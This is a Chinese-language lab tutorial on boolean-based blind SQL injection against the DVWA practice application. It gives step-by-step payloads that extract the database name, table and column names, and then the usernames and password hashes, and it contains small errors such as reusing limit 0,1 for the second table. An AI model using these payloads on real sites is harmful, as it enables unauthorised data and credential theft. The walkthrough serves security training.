dvwa sql

 

SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

 

手工盲注的过程，就像你与一个机器人聊天，这个机器人知道的很多，但只会回答“是”或者“不是”，因此你需要询问它这样的问题，例如“数据库名字的第一个字母是不是a啊？”，通过这种机械的询问，最终获得你想要的数据。

 

盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注，这里由于实验环境的限制，只演示基于布尔的盲注与基于时间的盲注。

 

判断是否存在注入，注入是字符型还是数字型

猜解当前数据库名

猜解数据库中的表名

猜解表中的字段名

猜解数据

盲注中常用的几个函数：

 

substr()

count()

ascii()

length()

left()

char_length()

基于布尔盲注

1.判断是否存在注入，注入类型

输入 1， 输出 exists

1' or 1=1 # ，输出 exists

'1 or 1=1，

存在字符型的盲注。

 

2.猜数据库名

如果按照SQL 注入的方式 执行：1' union select 1,database() #

并不能返回数据库名，先猜库名长度：

1' and length(database())=1 # ，显示不存在

直到 1' and length(database())=4 # ， 显示存在。

说明库名长度为4

 

然后采用二分法猜数据库的名字。

 

输入1' and ascii(substr(database(),1,1))>88 #，显示存在，说明数据库名的第一个字符的ascii值大于88；

 

输入1' and ascii(substr(database(),1,1))<110 #，显示存在，说明数据库名的第一个字符的ascii值小于110；

 

重复上面的第一、第二步骤，直到猜到准确的数为止。我们通过试验知道了，这里第一个ASCII值为100，ASCII的表去找对应的字母，接下来按照第一、第二步骤继续第二个字母：

 

输入1' and ascii(substr(database(),2,1))>88 #

去找第二个字母 ，重复以上步骤，得到库名为dvwa

 

3.猜解数据库中的表名

先猜表的个数 1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 # ，输出MISSING 不存在

接着 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #，输出MISSING 不存在

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #，输出exists 存在

所以有两个表，我们先猜第一个表的长度

 

输入：1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #，输出MISSING

 

使用二分法 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #，输出 exists

 

直到—— 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #，输出 exists。

 

即第一个表名称字符长为9。

 

现在猜第一个表的第一个字母

 

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #

直到—— 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #，即对应的字母为g

然后我们再去猜其他的9个字母，为u、e、s、t、b、o、o、k，即为guestbook。

 

以及去猜第二个表

 

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>88 #

重复上面第一个表的步骤，得到第二个表为，users

 

4.猜列名

就直接拿 users表为例了。

 

先猜表中的字段数目1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #

（中间步骤省略了） 数目为 8

 

猜user表各个名称，按照常规流程，从users表的第1个字段开始，对其猜解每一个组成字符，获取到完整的第1个字段名称…然后是第2/3/…/8个字段名称。当字段数目较多、名称较长的时候，若依然按照以上方式手工猜解，则会耗费比较多的时间。当时间有限的情况下，实际上有的字段可能并不太需要获取，字段的位置也暂且不作太多关注，首先获取几个包含键信息的字段，如：用户名、密码…

 

【猜想】数据库中可能保存的字段名称

用户名：username/user_name/uname/u_name/user/name/…

密码：password/pass_word/pwd/pass/…

所以说我们的命令就可以是

 

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #，输出exists

 

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #，输出exists

 

所以我们可以知道 users表中有 user和password。还可以试试别的

 

5.猜表中的字段值

同样使用二分法来做，直接写最后一步了：

 

用户名的字段值：1' and length(substr((select user from users limit 0,1),1))=5 #，输出exists；说明user字段中第1个字段值的字符长度=5。

 

密码的字段值：1' and length(substr((select password from users limit 0,1),1))=32 #，输出exists；说明password字段中第1个字段值的字符长度=32（基本上这么长的密码位数可能是用md5的加密方式保存的）

 

然后再使用二分法猜解user字段的值：（用户名）

 

1' and ascii(substr((select user from users limit 0,1),1,1))=xxx #（第一个字符）

1' and ascii(substr((select user from users limit 0,1),2,1))=xxx #（第二个字符）

猜解password字段的值：（密码）

 

1' and ascii(substr((select password from users limit 0,1),1,1))=xxx #（第一个字符）